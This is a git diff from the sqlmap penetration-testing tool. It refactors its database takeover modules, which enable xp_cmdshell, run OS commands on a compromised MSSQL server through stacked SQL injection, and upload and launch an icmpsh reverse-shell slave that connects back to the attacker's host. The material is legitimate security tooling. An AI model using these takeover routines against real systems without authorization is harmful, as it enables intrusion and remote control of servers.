diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py index ee7b82355..d37b31885 100755 --- a/extra/icmpsh/icmpsh_m.py +++ b/extra/icmpsh/icmpsh_m.py @@ -93,7 +93,7 @@ def main(src, dst): except: pass - if cmd == 'exit': + if cmd == 'exit\n': return # Set sequence number and identifier diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py index 3dcbd7515..47ccaebcd 100644 --- a/lib/takeover/abstraction.py +++ b/lib/takeover/abstraction.py @@ -32,7 +32,7 @@ class Abstraction(Web, UDF, xp_cmdshell): Web.__init__(self) xp_cmdshell.__init__(self) - def execCmd(self, cmd, silent=False, forgeCmd=False): + def execCmd(self, cmd, silent=False): if self.webBackdoorUrl and not kb.stackedTest: self.webBackdoorRunCmd(cmd) @@ -40,7 +40,7 @@ class Abstraction(Web, UDF, xp_cmdshell): self.udfExecCmd(cmd, silent=silent) elif kb.dbms == "Microsoft SQL Server": - self.xpCmdshellExecCmd(cmd, silent, forgeCmd) + self.xpCmdshellExecCmd(cmd, silent) else: errMsg = "Feature not yet implemented for the back-end DBMS" @@ -79,7 +79,7 @@ class Abstraction(Web, UDF, xp_cmdshell): else: dataToStdout("No output\n") else: - self.execCmd(cmd, forgeCmd=True) + self.execCmd(cmd) def shell(self): if self.webBackdoorUrl and not kb.stackedTest: diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py index 102b961b4..4872a96d0 100644 --- a/lib/takeover/icmpsh.py +++ b/lib/takeover/icmpsh.py @@ -7,40 +7,21 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/) See the file 'doc/COPYING' for copying permission """ -import codecs import os -import re -import stat -import sys import time -from select import select -from subprocess import PIPE -from subprocess import Popen as execute - from extra.icmpsh.icmpsh_m import main as icmpshmaster -from lib.core.common import dataToStdout from lib.core.common import getLocalIP from lib.core.common import getRemoteIP -from lib.core.common import getUnicode from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes -from lib.core.common import pollProcess -from lib.core.common import randomRange from lib.core.common import randomStr from lib.core.common import readInput from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths -from lib.core.exception import sqlmapDataException -from lib.core.exception import sqlmapFilePathException -from lib.core.subprocessng import blockingReadFromFD -from lib.core.subprocessng import blockingWriteToFD -from lib.core.subprocessng import setNonBlocking -from lib.request.connect import Connect as Request -from lib.takeover.upx import upx class ICMPsh: @@ -81,22 +62,18 @@ class ICMPsh: infoMsg = "running icmpsh slave remotely" logger.info(infoMsg) - self.__icmpshSlaveCmd = "%s -t %s -d 500 -b 30 -s 128" % (self.__icmpslaveRemote, self.lhostStr) - - cmd = "%s &" % self.__icmpshSlaveCmd - - if kb.dbms == "Microsoft SQL Server" and (kb.stackedTest or conf.direct): - cmd = self.xpCmdshellForgeCmd(cmd) + cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self.__icmpslaveRemote, self.lhostStr) self.execCmd(cmd, silent=True) def uploadIcmpshSlave(self, web=False): self.__randStr = randomStr(lowercase=True) + self.__icmpslaveRemoteBase = "tmpi%s.exe" % self.__randStr if web: - self.__icmpslaveRemote = "%s/tmpi%s.exe" % (self.webDirectory, self.__randStr) + self.__icmpslaveRemote = "%s/%s" % (self.webDirectory, self.__icmpslaveRemoteBase) else: - self.__icmpslaveRemote = "%s/tmpi%s.exe" % (conf.tmpPath, self.__randStr) + self.__icmpslaveRemote = "%s/%s" % (conf.tmpPath, self.__icmpslaveRemoteBase) self.__icmpslaveRemote = ntToPosixSlashes(normalizePath(self.__icmpslaveRemote)) @@ -115,4 +92,7 @@ class ICMPsh: debugMsg = "icmpsh master exited" logger.debug(debugMsg) - self.delRemoteFile(self.__icmpslaveRemote, doubleslash=True) + time.sleep(1) + self.execCmd("taskkill /F /IM %s" % self.__icmpslaveRemoteBase, silent=True) + time.sleep(1) + self.delRemoteFile(self.__icmpslaveRemote) diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 4ddbd48e6..b0f33ddd2 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -397,9 +397,6 @@ class Metasploit: cmd = "%s &" % self.exeFilePathRemote - if kb.dbms == "Microsoft SQL Server" and (kb.stackedTest or conf.direct): - cmd = self.xpCmdshellForgeCmd(cmd) - self.execCmd(cmd, silent=True) def __loadMetExtensions(self, proc, metSess): @@ -648,7 +645,8 @@ class Metasploit: logger.debug(debugMsg) if not goUdf: - self.delRemoteFile(self.exeFilePathRemote, doubleslash=True) + time.sleep(1) + self.delRemoteFile(self.exeFilePathRemote) def smb(self): self.__initVars() diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py index 348c57213..11ca94953 100644 --- a/lib/takeover/registry.py +++ b/lib/takeover/registry.py @@ -87,7 +87,7 @@ class Registry: if index != -1: data = data[index + len(pattern):] - self.delRemoteFile(self.__batPathRemote, doubleslash=True) + self.delRemoteFile(self.__batPathRemote) return data @@ -101,8 +101,8 @@ class Registry: debugMsg += "to registry key '%s'" % self.__regKey logger.debug(debugMsg) - self.execCmd(cmd=self.__batPathRemote, forgeCmd=True) - self.delRemoteFile(self.__batPathRemote, doubleslash=True) + self.execCmd(cmd=self.__batPathRemote) + self.delRemoteFile(self.__batPathRemote) def delRegKey(self, regKey, regValue): self.__operation = "delete" @@ -114,5 +114,5 @@ class Registry: debugMsg += "from registry key '%s'" % self.__regKey logger.debug(debugMsg) - self.execCmd(cmd=self.__batPathRemote, forgeCmd=True) - self.delRemoteFile(self.__batPathRemote, doubleslash=True) + self.execCmd(cmd=self.__batPathRemote) + self.delRemoteFile(self.__batPathRemote) diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index 0a2cc0599..390617974 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -36,7 +36,7 @@ class xp_cmdshell: cmd += "RECONFIGURE WITH OVERRIDE; " cmd += "EXEC master..sp_configure 'ole automation procedures', 1; " cmd += "RECONFIGURE WITH OVERRIDE; " - self.xpCmdshellExecCmd(cmd) + inject.goStacked(cmd) self.__randStr = randomStr(lowercase=True) @@ -51,7 +51,7 @@ class xp_cmdshell: if kb.dbmsVersion[0] in ( "2005", "2008" ): cmd += " RECONFIGURE WITH OVERRIDE;" - self.xpCmdshellExecCmd(cmd) + inject.goStacked(cmd) def __xpCmdshellConfigure2005(self, mode): debugMsg = "configuring xp_cmdshell using sp_configure " @@ -85,10 +85,10 @@ class xp_cmdshell: else: cmd = self.__xpCmdshellConfigure2000(mode) - self.xpCmdshellExecCmd(cmd) + inject.goStacked(cmd) def __xpCmdshellCheck(self): - query = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2)) + query = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2)) duration = timeUse(query) if duration >= conf.timeSec: @@ -102,17 +102,15 @@ class xp_cmdshell: return forgedCmd - def xpCmdshellExecCmd(self, cmd, silent=False, forgeCmd=False): - if forgeCmd: - cmd = self.xpCmdshellForgeCmd(cmd) - + def xpCmdshellExecCmd(self, cmd, silent=False): + cmd = self.xpCmdshellForgeCmd(cmd) inject.goStacked(cmd, silent) def xpCmdshellEvalCmd(self, cmd, first=None, last=None): self.getRemoteTempPath() tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True)) - cmd = self.xpCmdshellForgeCmd("%s > %s" % (cmd, tmpFile)) + cmd = "%s > %s" % (cmd, tmpFile) self.xpCmdshellExecCmd(cmd) diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py index fb46cf6e1..b5aae1cc6 100644 --- a/plugins/dbms/mssqlserver/filesystem.py +++ b/plugins/dbms/mssqlserver/filesystem.py @@ -146,13 +146,10 @@ class Filesystem(GenericFilesystem): logger.debug("moving binary file %s to %s" % (sFile, dFile)) - commands = ("cd \"%s\"" % tmpPath, - "ren %s %s" % (chunkName, dFileName), - "move /Y %s %s" % (dFileName, dFile)) - complComm = " & ".join(command for command in commands) - forgedCmd = self.xpCmdshellForgeCmd(complComm) + commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile)) + complComm = " & ".join(command for command in commands) - self.execCmd(forgedCmd) + self.execCmd(complComm) else: infoMsg = "the %s file is bigger than %d " % (fileType, debugSize) @@ -177,13 +174,10 @@ class Filesystem(GenericFilesystem): infoMsg += "%s\%s to %s\%s" % (tmpPath, chunkName, tmpPath, dFileName) logger.debug(infoMsg) - commands = ("cd %s" % tmpPath, - copyCmd, - "del /F %s" % chunkName) - complComm = " & ".join(command for command in commands) - forgedCmd = self.xpCmdshellForgeCmd(complComm) + commands = ("cd %s" % tmpPath, copyCmd, "del /F %s" % chunkName) + complComm = " & ".join(command for command in commands) - self.execCmd(forgedCmd) + self.execCmd(complComm) logger.info("file chunk %d written" % counter) @@ -193,12 +187,10 @@ class Filesystem(GenericFilesystem): logger.debug("moving binary file %s to %s" % (sFile, dFile)) - commands = ("cd %s" % tmpPath, - "move /Y %s %s" % (dFileName, dFile)) + commands = ("cd %s" % tmpPath, "move /Y %s %s" % (dFileName, dFile)) complComm = " & ".join(command for command in commands) - forgedCmd = self.xpCmdshellForgeCmd(complComm) - self.execCmd(forgedCmd) + self.execCmd(complComm) if confirm: self.askCheckWrittenFile(wFile, dFile, fileType) diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py index ca0067b38..142c35f01 100644 --- a/plugins/generic/filesystem.py +++ b/plugins/generic/filesystem.py @@ -205,26 +205,18 @@ class Filesystem: charCounter += len(forgedScrLine) if charCounter >= maxLen: - forgedCmd = self.xpCmdshellForgeCmd(cmd) - self.execCmd(forgedCmd) + self.execCmd(cmd) - cmd = "" + cmd = "" charCounter = 0 if cmd: - forgedCmd = self.xpCmdshellForgeCmd(cmd) - self.execCmd(forgedCmd) - - commands = ( - "cd %s" % tmpPath, - "debug < %s" % randScr, - "del /F /Q %s" % randScr - ) + self.execCmd(cmd) + commands = ( "cd %s" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr ) complComm = " & ".join(command for command in commands) - forgedCmd = self.xpCmdshellForgeCmd(complComm) - self.execCmd(forgedCmd, silent=True) + self.execCmd(complComm, silent=True) return chunkName diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py index 619bd4835..629930b30 100644 --- a/plugins/generic/misc.py +++ b/plugins/generic/misc.py @@ -75,20 +75,16 @@ class Miscellaneous: kb.bannerFp["dbmsVersion"] = inject.getValue(query, unpack=False) kb.bannerFp["dbmsVersion"] = kb.bannerFp["dbmsVersion"].replace(",", "").replace("-", "").replace(" ", "") - def delRemoteFile(self, tempFile, doubleslash=False): + def delRemoteFile(self, tempFile): self.checkDbmsOs() if kb.os == "Windows": - if doubleslash: - tempFile = tempFile.replace("/", "\\\\") - else: - tempFile = posixToNtSlashes(tempFile) - + tempFile = posixToNtSlashes(tempFile) cmd = "del /F /Q %s" % tempFile else: cmd = "rm -f %s" % tempFile - self.execCmd(cmd, forgeCmd=True) + self.execCmd(cmd) def createSupportTbl(self, tblName, tblField, tblType): inject.goStacked("DROP TABLE %s" % tblName) diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index 62b84ff93..15c78b925 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -153,6 +153,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): errMsg += "is unlikely to receive commands send from you" logger.error(errMsg) + self.sysUdfs.pop("sys_bineval") + if kb.stackedTest or conf.direct: web = False @@ -207,7 +209,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): elif tunnel == 2: self.uploadIcmpshSlave(web=web) self.icmpPwn() - + elif not kb.stackedTest and kb.dbms == "MySQL": web = True @@ -244,8 +246,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): if not web or (web and self.webBackdoorUrl is not None): self.pwn(goUdf) - if not conf.cleanup: - self.cleanup() + if not conf.cleanup: + self.cleanup() def osSmb(self): stackedTest()